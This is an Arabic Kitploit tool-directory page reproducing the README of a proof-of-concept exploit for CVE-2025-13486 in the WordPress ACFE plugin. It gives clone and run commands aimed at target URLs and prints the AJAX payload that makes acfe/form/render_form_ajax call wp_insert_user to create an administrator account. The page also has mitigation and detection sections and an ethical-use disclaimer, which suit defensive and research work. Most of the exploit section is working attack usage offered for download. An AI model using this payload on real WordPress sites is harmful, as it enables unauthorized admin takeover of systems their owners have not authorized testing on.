Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-13486 — ثغرة في إضافة ووردبريس Advanced Custom Fields Extended (ACFE) لتنفيذ التعليمات البرمجية عن بعد - إنشاء مشرف | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

ثغرة في إضافة ووردبريس Advanced Custom Fields Extended (ACFE) لتنفيذ التعليمات البرمجية عن بعد - إنشاء مشرف

عرض المستودع
11منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔴 CVE-2025-13486 - استغلال ملحق حقول مخصصة متقدمة (ACFE) لووردبريس

WordPress Python License Status

WordPress Logo

📋 نظرة عامة

استغلال إثبات المفهوم لـ CVE-2025-13486، ثغرة خطيرة في ملحق الحقول المخصصة المتقدمة: الموسعة (ACFE) لووردبريس تسمح بتنفيذ التعليمات البرمجية عن بعد مما يؤدي إلى تصعيد الامتيازات.

🎯 تفاصيل الثغرة

الجانبالتفاصيل
معرف CVECVE-2025-13486
الملحقAdvanced Custom Fields: Extended (ACFE)
النوعتنفيذ التعليمات البرمجية عن بعد → تصعيد الامتيازات
مستوى الخطرحرج
الإصدارات المتأثرةإصدارات ACFE الضعيفة (الإصدارات المحددة غير معروفة)
درجة CVSS9.8 حرج
تاريخ الاكتشاف2025
المؤلف0xgh057r3c0n

⚠️ إخلاء مسؤولية الاستخدام الأخلاقي

⚠️ تحذير: هذه الأداة مخصصة فقط للاختبارات الأمنية المصرح بها والأغراض التعليمية.

✅ الاستخدام المسموح به:

  • البحث الأمني والتعليم
  • اختبار أنظمتك الخاصة
  • اختبار الاختراق المصرح به بإذن كتابي
  • البحث الأكاديمي والتدريس
  • التدريب على الوعي الأمني

❌ الاستخدام المحظور:

  • الاختبار غير المصرح به لأنظمة لا تملكها
  • الهجمات الخبيثة أو الاختراق
  • أي أنشطة غير قانونية
  • انتهاك قوانين الاحتيال الحاسوبي (CFAA، إلخ)
  • الاختبار الأمني غير الأخلاقي

المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. احرص دائمًا على الحصول على إذن كتابي مناسب قبل اختبار أي نظام.

🔧 الميزات

🔍 وضع التحقق

  • استخراج nonce من صفحات ووردبريس
  • تأكيد الثغرة باستخدام دالة print_r
  • تحقق آمن دون استغلال
  • مطابقة أنماط متعددة لاكتشاف nonce

⚡ وضع الاستغلال

  • إنشاء مستخدم إداري عبر wp_insert_user
  • بيانات اعتماد مخصصة أو عشوائية
  • دعم أسماء مستخدمين وكلمات مرور وبريد إلكتروني مخصصة
  • تحليل الاستجابة لمؤشرات النجاح

🛠️ الميزات التقنية

  • كشف تلقائي للبروتوكول (HTTP/HTTPS)
  • إخراج طرفي ملون
  • تخطي التحقق من SSL لبيئات الاختبار
  • تقارير أخطاء وتصحيح مفصلة
  • معالجة المهلات والاتصالات

📦 التثبيت

المتطلبات

  • Python 3.6+
  • مكتبة requests

الإعداد

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# تثبيت التبعيات
pip install requests

# بديل: التثبيت من requirements.txt
pip install -r requirements.txt

# جعل البرنامج النصي قابلاً للتنفيذ (لينكس/ماك)
chmod +x exploit.py

التبعيات

أنشئ ملف requirements.txt:

root@kitploit:~
requests>=2.25.1

🚀 الاستخدام

الصيغة الأساسية

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

أمثلة

1. التحقق من الثغرة فقط (اختبار آمن)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. استغلال ببيانات اعتماد عشوائية

root@kitploit:~
python3 exploit.py --url https://target.com

3. استغلال ببيانات اعتماد مخصصة

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. هدف بدون بروتوكول (كشف تلقائي)

root@kitploit:~
python3 exploit.py --url target.com --verify

خيارات سطر الأوامر

🧪 كيفية العمل

1. آلية الثغرة

يستغل هذا الاستغلال معالجة غير صحيحة للدوال في نقطة النهاية acfe/form/render_form_ajax لملحق ACFE، مما يسمح للمهاجمين باستدعاء دوال PHP عشوائية.

2. التدفق التقني

root@kitploit:~
1. التحقق من URL → كشف تلقائي لـ HTTP/HTTPS
2. استخراج nonce → مسح الصفحة بحثًا عن nonce الخاص بـ ACF
3. بناء الحمولة → إنشاء طلب AJAX ضار
4. تنفيذ الطلب → إرسال الاستغلال إلى الهدف
5. تحليل النتيجة → التحقق من مؤشرات النجاح

3. حمولة الاستغلال

root@kitploit:~
// نمط الكود الضعيف في ACFE
$result = call_user_func_array($form['render'], array($form));

// هيكل حمولة الاستغلال
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ التخفيف

الإجراءات الفورية

  1. تحديث الملحق: قم بتحديث ملحق ACFE فورًا إلى أحدث إصدار
  2. إزالة الملحق: إذا لم يكن التحديث متاحًا، قم بتعطيل ACFE مؤقتًا
  3. جدار حماية تطبيقات الويب: انشر قواعد WAF لمنع الطلبات الضارة
  4. المراقبة: راقب إنشاء مستخدم إداري مشبوه

تعزيز أمان ووردبريس

root@kitploit:~
# ملحقات الأمان الموصى بها
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# حماية على مستوى الخادم
- تنفيذ تحديد المعدل
- تمكين قواعد mod_security
- استخدام Cloudflare أو CDN مشابه
- تدقيقات أمنية منتظمة

🔍 الكشف

مؤشرات الاختراق (IOCs)

  • إنشاء مستخدم إداري غير مصرح به
  • طلبات AJAX مشبوهة إلى /wp-admin/admin-ajax.php
  • طلبات تحتوي على action=acfe/form/render_form_ajax
  • استدعاءات غير متوقعة لدالة wp_insert_user عبر AJAX

مراقبة السجلات

root@kitploit:~
# سجلات Apache
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# سجلات تصحيح ووردبريس
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 المراجع

  1. مستودع ملحقات ووردبريس: Advanced Custom Fields: Extended
  2. قاعدة بيانات CVE: CVE-2025-13486
  3. فريق أمان ووردبريس: إرشادات أمان الملحقات
  4. OWASP Top 10: هجمات الحقن

🤝 المساهمة

  1. اعمل Fork للمستودع
  2. أنشئ فرع ميزة (git checkout -b feature/improvement)
  3. قم بالتغييرات (git commit -am 'إضافة ميزة جديدة')
  4. ادفع إلى الفرع (git push origin feature/improvement)
  5. أنشئ طلب سحب

إرشادات المساهمين

  • اتبع دليل أسلوب Python PEP 8
  • أضف تعليقات للمنطق المعقد
  • تضمين معالجة الأخطاء
  • تحديث التوثيق

🐛 الإبلاغ عن المشكلات

يرجى الإبلاغ عن الأخطاء والمشكلات عبر:

  1. مشكلات GitHub: إنشاء مشكلة جديدة
  2. الثغرات الأمنية: الإفصاح المسؤول للمؤلف أولاً

📊 هيكل المشروع

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # البرنامج النصي الرئيسي للاستغلال
├── README.md           # هذا التوثيق
├── requirements.txt    # تبعيات Python
├── LICENSE            # ملف ترخيص MIT
├── examples/          # أمثلة الاستخدام
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # نصوص الاختبار
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 المؤلف

0xgh057r3c0n - باحث أمني

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

تم بناؤه بـ ❤️ لمجتمع الأمن
⚠️ استخدم بمسؤولية وأخلاقية ⚠️

تنزيل الأداة
الخيارالوصفمطلوبالافتراضي
-u, --urlعنوان URL الخاص بالووردبريس المستهدفنعم-
--verifyتحقق فقط، لا استغلاللاFalse
--userاسم مستخدم مخصص للمسؤوللاadmin_XXXXX
--passwordكلمة مرور مخصصة للمسؤوللا12 حرفًا عشوائيًا
--emailبريد إلكتروني مخصص للمسؤوللا[email protected]